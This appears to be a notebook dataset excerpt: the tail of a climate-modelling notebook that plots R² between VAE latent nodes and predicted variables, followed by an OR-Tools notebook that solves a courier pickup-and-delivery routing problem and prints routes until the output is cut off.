plt.plot(SP_output_corr_node_2_R_2[65:95],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[65:95],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[65:95],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_3.set_yticklabels([])\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('R²', Fontsize=20)\n plt.grid(True)\n plt.title('Specific Humidity', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_4=plt.subplot(1,4,4)\n plt.plot(SP_output_corr_node_0_R_2[95:125],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[95:125],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[95:125],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[95:125],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[95:125],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_4.set_yticklabels([])\n plt.legend(fontsize=16)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('R²', Fontsize=20)\n\n plt.grid(True)\n plt.title('Temperature', Fontsize=24 )\n inv=plt.gca()\n inv.invert_yaxis()\n\n \n \n scalar=[60,61,62,63,64,125,126,127,128]\n \n dg=pd.DataFrame([[labels[k],SP_output_corr_node_0_R_2[k],\n SP_output_corr_node_1_R_2[k],\n 
SP_output_corr_node_2_R_2[k],\n SP_output_corr_node_3_R_2[k],\n SP_output_corr_node_4_R_2[k]] for k in scalar],\n columns=['Variable','Node 0', 'Node 1','Node 2', 'Node 3','Node 4'])\n \n \n \n \n \n return dg",
"_____no_output_____"
],
[
"# plot vertical linear R² profiles in space-time \nquad_plot_R2_updated(overall_corr_node_0**2,\n overall_corr_node_1**2,\n overall_corr_node_2**2,\n overall_corr_node_3**2,\n overall_corr_node_4**2,\n P,all_labels)",
"<ipython-input-10-dd10d52bdd82>:36: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity Tend.', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:38: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.ylabel('P [hPa]', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:41: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:43: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:44: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.yticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:56: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:58: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:64: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature Tend.', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:74: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:78: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:80: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:90: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\nNo handles with labels found to put in legend.\n<ipython-input-10-dd10d52bdd82>:95: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:98: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature', Fontsize=24 )\n"
],
[
"## transform encoder_resp and VAE_resp from space-time data sets into 3D arrays with (time, latitude*longitude, dim_3.size)\n\nencoder_resp_matr=np.reshape(encoder_resp,(time,lat.size*lon.size,encoder_resp[0,:].size))\noutput_resp_matr=np.reshape(VAE_resp,(time,lat.size*lon.size,VAE_resp[0,:].size))\n",
"_____no_output_____"
]
],
[
[
"# compute median squared linear correlation along time axis of 3D data arrays ",
"_____no_output_____"
],
[
"compute the linear correlation between latent nodes and the output data array in each horizontal grid cell ",
"_____no_output_____"
]
],
[
[
"overall_corr_node_0_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_1_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_2_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_3_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_4_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\n\n\nfor i in tqdm(np.arange(overall_corr_node_0_lat_lon[:,1].size)):\n \n for j in np.arange(overall_corr_node_0_lat_lon[1,:].size):\n\n overall_corr_node_0_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,4],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_1_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,1],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_2_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,0],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_3_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,2],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_4_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,3],output_resp_matr[:,i,j])[0,1]\n",
"<ipython-input-10-387862e6db26>:8: TqdmDeprecationWarning: This function will be removed in tqdm==5.0.0\nPlease use `tqdm.notebook.tqdm` instead of `tqdm.tqdm_notebook`\n for i in tqdm(np.arange(overall_corr_node_0_lat_lon[:,1].size)):\n"
]
],
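The double loop above can be vectorized along the grid-cell axis; a sketch assuming the reshaped `(time, cells, dim)` arrays from above (`node_idx` and `var_idx` are placeholders for one latent node and one output variable):

```python
import numpy as np

def corr_along_time(a, b):
    # Pearson r over axis 0 for matched (time, cells) arrays
    a = (a - a.mean(0)) / a.std(0)
    b = (b - b.mean(0)) / b.std(0)
    return (a * b).mean(0)              # one r per grid cell

node_idx, var_idx = 4, 0                # e.g. Node 1 (original dim 5) vs. first output variable
r = corr_along_time(encoder_resp_matr[:, :, node_idx], output_resp_matr[:, :, var_idx])
```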
[
[
"plot the median of R² values as a function of pressure for 3D variables and construct table for 2D variables ",
"_____no_output_____"
]
],
[
[
"def quad_plot_PC_R_2_updated(SP_output_corr_node_0_R_2,\n SP_output_corr_node_1_R_2,\n SP_output_corr_node_2_R_2,\n SP_output_corr_node_3_R_2,\n SP_output_corr_node_4_R_2,\n press,labels):\n \n \"\"\"\n author: Gunnar Behrens\n \n plot squared linear correlation in time between latent nodes and VAE_clim_clim_conv predictions\n as vertical profiles in pressure coordinates for 3D variables and retrieve R² space-time values for 2D\n variables\n \n SP_output_corr_node_*_R_2 -- squarred corr coefs of each latent node \n press -- vertical axis in pressure coords\n labels -- predicted variable list\n \n \"\"\"\n \n \n import pandas as pd \n Press=press/100\n \n c_map=[[0,0,0,1],[1,0,1,1],[0,0,1,1],[0,0.4,0.5,1],[0.6,0.4,0,1]]\n plt.figure(1,(24,9))\n plt.subplot(1,4,1)\n plt.plot(SP_output_corr_node_0_R_2[0:30],Press[0:30],color=c_map[0],\n label='Node 1')\n plt.plot(SP_output_corr_node_1_R_2[0:30],Press[0:30],color=c_map[1],\n label='Node 2')\n plt.plot(SP_output_corr_node_2_R_2[0:30],Press[0:30],color=c_map[2],\n label='Node 3')\n plt.plot(SP_output_corr_node_3_R_2[0:30],Press[0:30],color=c_map[3],\n label='Node 4')\n plt.plot(SP_output_corr_node_4_R_2[0:30],Press[0:30],color=c_map[4],\n label='Node 5')\n plt.title('Specific Humidity Tend.', Fontsize=24)\n plt.legend(fontsize=17,loc=2)\n plt.ylabel('Pressure [hPa]', Fontsize=24)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('Median R²', Fontsize=20)\n\n plt.xticks(Fontsize=16)\n plt.yticks(Fontsize=16)\n\n plt.grid(True)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_2=plt.subplot(1,4,2)\n plt.plot(SP_output_corr_node_0_R_2[30:60],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[30:60],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[30:60],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[30:60],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[30:60],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_2.set_yticklabels([])\n plt.xlabel('Median R²', Fontsize=20)\n\n #plt.legend(fontsize=12)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.grid(True)\n \n plt.title('Temperature Tend.', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n\n ax_3=plt.subplot(1,4,3)\n plt.plot(SP_output_corr_node_0_R_2[65:95],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[65:95],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[65:95],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[65:95],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[65:95],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_3.set_yticklabels([])\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('Median R²', Fontsize=20)\n plt.grid(True)\n plt.title('Specific Humidity', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_4=plt.subplot(1,4,4)\n plt.plot(SP_output_corr_node_0_R_2[95:125],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[95:125],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[95:125],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[95:125],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[95:125],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_4.set_yticklabels([])\n plt.legend(fontsize=16)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('Median R²', Fontsize=20)\n\n plt.grid(True)\n plt.title('Temperature', Fontsize=24 )\n inv=plt.gca()\n inv.invert_yaxis()\n\n \n \n scalar=[60,61,62,63,64,125,126,127,128]\n \n 
dg=pd.DataFrame([[labels[k],SP_output_corr_node_0_R_2[k],\n SP_output_corr_node_1_R_2[k],\n SP_output_corr_node_2_R_2[k],\n SP_output_corr_node_3_R_2[k],\n SP_output_corr_node_4_R_2[k]] for k in scalar],\n columns=['Variable','Node 0', 'Node 1','Node 2', 'Node 3','Node 4'])\n \n \n \n \n \n return dg",
"_____no_output_____"
],
[
"# compute median squared linear correlation coefficients along time axis, plot results \nquad_plot_PC_R_2_updated(np.median(overall_corr_node_0_lat_lon**2,0),\n np.median(overall_corr_node_1_lat_lon**2,0),\n np.median(overall_corr_node_2_lat_lon**2,0),\n np.median(overall_corr_node_3_lat_lon**2,0),\n np.median(overall_corr_node_4_lat_lon**2,0),\n P,all_labels)",
"<ipython-input-11-fc037c58d525>:38: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity Tend.', Fontsize=24)\n<ipython-input-11-fc037c58d525>:40: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.ylabel('Pressure [hPa]', Fontsize=24)\n<ipython-input-11-fc037c58d525>:43: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:45: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:46: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.yticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:58: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:60: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:67: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature Tend.', Fontsize=24)\n<ipython-input-11-fc037c58d525>:77: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:81: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:83: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity', Fontsize=24)\n<ipython-input-11-fc037c58d525>:93: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\nNo handles with labels found to put in legend.\n<ipython-input-11-fc037c58d525>:98: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:101: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature', Fontsize=24 )\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e70807bb0034f327c330e69092fe5a9244e05542 | 92,698 | ipynb | Jupyter Notebook | OR tools.ipynb | team-lasalca/diversity-algo | e3e5992b9a259e9aa34c8a34b807da9ea7d072fb | [
"MIT"
] | null | null | null | OR tools.ipynb | team-lasalca/diversity-algo | e3e5992b9a259e9aa34c8a34b807da9ea7d072fb | [
"MIT"
] | null | null | null | OR tools.ipynb | team-lasalca/diversity-algo | e3e5992b9a259e9aa34c8a34b807da9ea7d072fb | [
"MIT"
] | null | null | null | 28.986241 | 262 | 0.388563 | [
[
[
"import pandas as pd\nimport numpy as np\nfrom json import loads, dumps\nfrom IPython.display import display\nfrom ortools.constraint_solver import routing_enums_pb2, pywrapcp\nfrom scipy.spatial import distance_matrix\nimport subprocess",
"_____no_output_____"
],
[
"inf = int(1e10)\nmax_time = (24 - 6) * 60\nstart = 6 * 60",
"_____no_output_____"
],
[
"#DATA_IN_PATH = \"phystech-master/data/contest_input.json\"\n#DATA_OUT_PATH = \"phystech-master/data/model_output.json\"\n\n#DATA_IN_PATH = \"phystech-master/data/simple_input.json\"\n#DATA_OUT_PATH = \"phystech-master/data/model_output.json\"\n\nDATA_IN_PATH = \"phystech-master/kamil/cls_input.json\"\nDATA_OUT_PATH = \"phystech-master/kamil/cls_output.json\"",
"_____no_output_____"
],
[
"with open(DATA_IN_PATH, 'r') as file:\n data_in_json = file.read()",
"_____no_output_____"
],
[
"data_in_python = loads(data_in_json)\ncolumns = list(data_in_python.keys())\ncolumns",
"_____no_output_____"
],
[
"dfs = {}\nfor key, value in data_in_python.items():\n dfs[key] = pd.DataFrame(value)\n\ncouriers = dfs[\"couriers\"]\ndepots = dfs[\"depots\"]\norders = dfs[\"orders\"]",
"_____no_output_____"
],
[
"places = []\nplaces_simple = []\npickups_deliveries = []\ntime_windows = []\n\n'''\nfor _, depot in depots.iterrows():\n place = {\"point_id\": depot[\"point_id\"], \"x\": depot[\"location_x\"], \"y\": depot[\"location_y\"], \"type\": \"depot\"}\n places_simple.append([place[\"x\"], place[\"y\"]])\n time_windows.append([0, max_time])\n places.append(place)\n'''\n\nfor i, order in orders.iterrows(): \n place = {\"point_id\": order[\"pickup_point_id\"], \"x\": order[\"pickup_location_x\"], \"y\": order[\"pickup_location_y\"], \"from\": order[\"pickup_from\"], \"to\": order[\"pickup_to\"], \"type\": \"pickup\"}\n place2 = {\"point_id\": order[\"dropoff_point_id\"], \"x\": order[\"dropoff_location_x\"], \"y\": order[\"dropoff_location_y\"], \"from\": order[\"dropoff_from\"], \"to\": order[\"dropoff_to\"], \"type\": \"dropoff\"}\n if place[\"from\"] >= place[\"to\"] or place2[\"from\"] >= place2[\"to\"]:\n orders.drop(i)\n continue\n \n pickups_deliveries.append([len(places_simple), len(places_simple) + 1])\n \n places_simple.append([place[\"x\"], place[\"y\"]])\n time_windows.append([place[\"from\"] - start, place[\"to\"] - start])\n places.append(place)\n \n places_simple.append([place2[\"x\"], place2[\"y\"]])\n time_windows.append([place2[\"from\"] - start, place2[\"to\"] - start])\n places.append(place2)\n\nroute_start = len(places_simple)\nfor _, courier in couriers.iterrows():\n places_simple.append([courier[\"location_x\"], courier[\"location_y\"]])\n time_windows.append([0, max_time])\n\nplaces = pd.DataFrame(places)\ndistances = distance_matrix(x=places_simple, y=places_simple, p=1) + 10\ndistances = np.append(distances, np.zeros(distances.shape[0]).reshape(-1, 1), axis=1)\ndistances = np.append(distances, np.zeros(distances.shape[1]).reshape(1, -1), axis=0)\ntime_windows.append([0, max_time])",
"_____no_output_____"
],
[
"orders.drop(\"pickup_location_x\", axis=1, inplace=True)\norders.drop(\"pickup_location_y\", axis=1, inplace=True)\norders.drop(\"pickup_from\", axis=1, inplace=True)\norders.drop(\"pickup_to\", axis=1, inplace=True)\n\norders.drop(\"dropoff_location_x\", axis=1, inplace=True)\norders.drop(\"dropoff_location_y\", axis=1, inplace=True)\norders.drop(\"dropoff_from\", axis=1, inplace=True)\norders.drop(\"dropoff_to\", axis=1, inplace=True)",
"_____no_output_____"
],
[
"display(couriers)\ndisplay(places)\ndisplay(orders)\n\ndisplay(distances)\ndisplay(time_windows)\ndisplay(pickups_deliveries)",
"_____no_output_____"
],
[
"print(\"couriers:\", couriers.shape)\nprint(\"places:\", places.shape)\nprint(\"orders:\", orders.shape)",
"couriers: (300, 3)\nplaces: (464, 6)\norders: (232, 12)\n"
],
[
"def print_solution(data, manager, routing, solution):\n \"\"\"Prints solution on console.\"\"\"\n max_route_distance = 0\n json = []\n \n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n \n plan_output += 'START ->';\n while not routing.IsEnd(index):\n if manager.IndexToNode(index) < places.index.stop:\n place = places.iloc[manager.IndexToNode(index)]\n plan_output += ' {} -> '.format(place[\"point_id\"])\n \n order_id = orders[((orders[\"pickup_point_id\"] == place[\"point_id\"]) | (orders[\"dropoff_point_id\"] == place[\"point_id\"]))][\"order_id\"]\n if len(order_id) != 0:\n order_id = order_id.head(1)\n else:\n order_id = -1\n \n current_json = {\n \"courier_id\": int(couriers.iloc[vehicle_id][\"courier_id\"]),\n \"action\": place[\"type\"], # check depot\n \"order_id\": int(order_id),\n \"point_id\": int(place[\"point_id\"]),\n }\n json.append(current_json)\n \n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n \n if manager.IndexToNode(index) < places.index.stop:\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n else:\n plan_output += 'END\\n'\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n print(plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n print('Maximum of the route distances: {}m'.format(max_route_distance))\n return json",
"_____no_output_____"
],
[
"data = {}\ndata[\"time_matrix\"] = distances\ndata[\"time_windows\"] = time_windows\ndata[\"num_vehicles\"] = len(couriers)\ndata[\"starts\"] = list(range(route_start, len(distances) - 1))\ndata[\"ends\"] = [len(distances) - 1] * len(couriers)\ndata[\"pickups_deliveries\"] = pickups_deliveries",
"_____no_output_____"
],
[
"%%time\nmanager = pywrapcp.RoutingIndexManager(len(data[\"time_matrix\"]), data[\"num_vehicles\"], data[\"starts\"], data[\"ends\"])\nrouting = pywrapcp.RoutingModel(manager)\n\ndef time_callback(from_index, to_index):\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data[\"time_matrix\"][from_node][to_node]\n\ntransit_callback_index = routing.RegisterTransitCallback(time_callback)\nrouting.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\ndimension_name = 'Time'\nrouting.AddDimension(\n transit_callback_index,\n max_time, # inf slack\n max_time, # vehicle maximum travel distance\n False, # start cumul to zero\n dimension_name)\n\ntime_dimension = routing.GetDimensionOrDie(dimension_name)\n\nfor location_idx in range(route_start): \n time_window = data[\"time_windows\"][location_idx]\n index = manager.NodeToIndex(location_idx)\n time_dimension.CumulVar(index).SetRange(int(time_window[0]), int(time_window[1]))\n\nfor vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n time_dimension.CumulVar(index).SetRange(int(data['time_windows'][-1][0]),\n int(data['time_windows'][-1][1]))\n\nfor i in range(data['num_vehicles']):\n routing.AddVariableMinimizedByFinalizer(\n time_dimension.CumulVar(routing.Start(i)))\n routing.AddVariableMinimizedByFinalizer(\n time_dimension.CumulVar(routing.End(i)))\n\nfor i, place in places.iterrows():\n order_payment = orders[((orders[\"pickup_point_id\"] == place[\"point_id\"]) | (orders[\"dropoff_point_id\"] == place[\"point_id\"]))][\"payment\"]\n if len(order_payment) != 0:\n order_payment = order_payment.head(1)\n else:\n order_payment = 0\n routing.AddDisjunction([manager.NodeToIndex(i)], int(order_payment))\n\nfor request in data[\"pickups_deliveries\"]:\n pickup_index = manager.NodeToIndex(request[0])\n delivery_index = manager.NodeToIndex(request[1])\n routing.AddPickupAndDelivery(pickup_index, delivery_index)\n routing.solver().Add(\n routing.VehicleVar(pickup_index) == routing.VehicleVar(\n delivery_index))\n routing.solver().Add(\n time_dimension.CumulVar(pickup_index) <=\n time_dimension.CumulVar(delivery_index))\n\nsearch_parameters = pywrapcp.DefaultRoutingSearchParameters()\nsearch_parameters.time_limit.seconds = 60 * 60\nsearch_parameters.first_solution_strategy = routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n\nsolution = routing.SolveWithParameters(search_parameters)",
"CPU times: user 1min 33s, sys: 12.2 ms, total: 1min 33s\nWall time: 1min 33s\n"
],
[
"if solution:\n print(routing.status())\n \n json = print_solution(data, manager, routing, solution)\n with open(DATA_OUT_PATH, \"w\") as out:\n out.write(dumps(json))\n print(\"Done.\")",
"1\nRoute for vehicle 0:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 1:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 2:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 3:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 4:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 5:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 6:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 7:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 8:\nSTART -> 47067 -> 43798 -> 44256 -> 44201 -> 63798 -> 64201 -> 64256 -> 67067 -> END\nDistance of the route: 237m\n\nRoute for vehicle 9:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 10:\nSTART -> 40260 -> 45290 -> 60260 -> 65290 -> END\nDistance of the route: 161m\n\nRoute for vehicle 11:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 12:\nSTART -> 43574 -> 42679 -> 46859 -> 62679 -> 63574 -> 66859 -> END\nDistance of the route: 181m\n\nRoute for vehicle 13:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 14:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 15:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 16:\nSTART -> 44517 -> 46319 -> 64517 -> 66319 -> END\nDistance of the route: 158m\n\nRoute for vehicle 17:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 18:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 19:\nSTART -> 41524 -> 61524 -> 42255 -> 42771 -> 43095 -> 44530 -> 62771 -> 63095 -> 62255 -> 64530 -> END\nDistance of the route: 339m\n\nRoute for vehicle 20:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 21:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 22:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 23:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 24:\nSTART -> 46967 -> 42245 -> 40374 -> 45230 -> 42493 -> 43179 -> 63179 -> 62245 -> 65230 -> 60374 -> 62493 -> 66967 -> END\nDistance of the route: 289m\n\nRoute for vehicle 25:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 26:\nSTART -> 43503 -> 63503 -> END\nDistance of the route: 81m\n\nRoute for vehicle 27:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 28:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 29:\nSTART -> 44259 -> 45684 -> 46043 -> 64259 -> 65684 -> 66043 -> END\nDistance of the route: 208m\n\nRoute for vehicle 30:\nSTART -> 40460 -> 40439 -> 45294 -> 42196 -> 46860 -> 62196 -> 65294 -> 60460 -> 60439 -> 66860 -> END\nDistance of the route: 240m\n\nRoute for vehicle 31:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 32:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 33:\nSTART -> 45224 -> 41995 -> 61995 -> 65224 -> END\nDistance of the route: 123m\n\nRoute for vehicle 34:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 35:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 36:\nSTART -> 40625 -> 60625 -> END\nDistance of the route: 134m\n\nRoute for vehicle 37:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 38:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 39:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 40:\nSTART -> 42510 -> 43322 -> 62510 -> 63322 -> END\nDistance of the route: 168m\n\nRoute for vehicle 41:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 42:\nSTART -> 47163 -> 41978 -> 42954 -> 47070 -> 61978 -> 62954 -> 67070 -> 67163 -> END\nDistance of the route: 282m\n\nRoute 
for vehicle 43:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 44:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 45:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 46:\nSTART -> 45921 -> 44885 -> 42202 -> 42485 -> 62202 -> 62485 -> 64885 -> 65921 -> END\nDistance of the route: 211m\n\nRoute for vehicle 47:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 48:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 49:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 50:\nSTART -> 44064 -> 45573 -> 65573 -> 64064 -> END\nDistance of the route: 169m\n\nRoute for vehicle 51:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 52:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 53:\nSTART -> 40201 -> 46099 -> 42025 -> 60201 -> 62025 -> 66099 -> END\nDistance of the route: 232m\n\nRoute for vehicle 54:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 55:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 56:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 57:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 58:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 59:\nSTART -> 45733 -> 40371 -> 42923 -> 60371 -> 62923 -> 65733 -> END\nDistance of the route: 229m\n\nRoute for vehicle 60:\nSTART -> 42520 -> 42332 -> 62520 -> 62332 -> END\nDistance of the route: 151m\n\nRoute for vehicle 61:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 62:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 63:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 